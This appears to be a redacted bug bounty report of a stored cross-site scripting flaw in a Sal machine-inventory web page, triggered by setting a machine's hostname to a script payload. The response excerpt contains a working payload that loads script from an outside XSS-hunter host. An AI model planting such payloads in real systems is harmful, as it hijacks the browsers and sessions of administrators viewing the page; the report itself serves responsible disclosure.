The page located at https://sal.██████.com/list/Activity/hour/all/0/
suffers from a Cross-site Scripting (XSS) vulnerability when a user has set their hostname on their machine to an XSS payload.
https://sal.██████.com/list/Activity/hour/all/0/
███████
https://sal.██████.com/
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
_ga=████████; _mkto_trk=id:███&token:_mch-█████.com-██████; _biz_uid=████████; _biz_nA=2; _biz_flagsA=%7B%22Version%22%3A1%2C%22Mkto%22%3A%221%22%7D; _biz_pendingA=%5B%5D; csrftoken=█████
><td><a href="/machine_detail/28/">███</a></td><td>██████████</td><td>2020-10-01 06:51 BST</td></tr><tr><td><a href="/machine_detail/17/">███████</a></td><td>██████</td><td>2020-10-01 06:50 BST</td></tr><tr><td><a href="/machine_detail/41/">"><script src="https://nahamsec.xss.ht"></script></a></td><td>bensdp</td><td>2020-10-01 06:49 BST</td></tr></tbody></table></div></div><div><div><div>██████</div></div><div>
Thanks,
Ben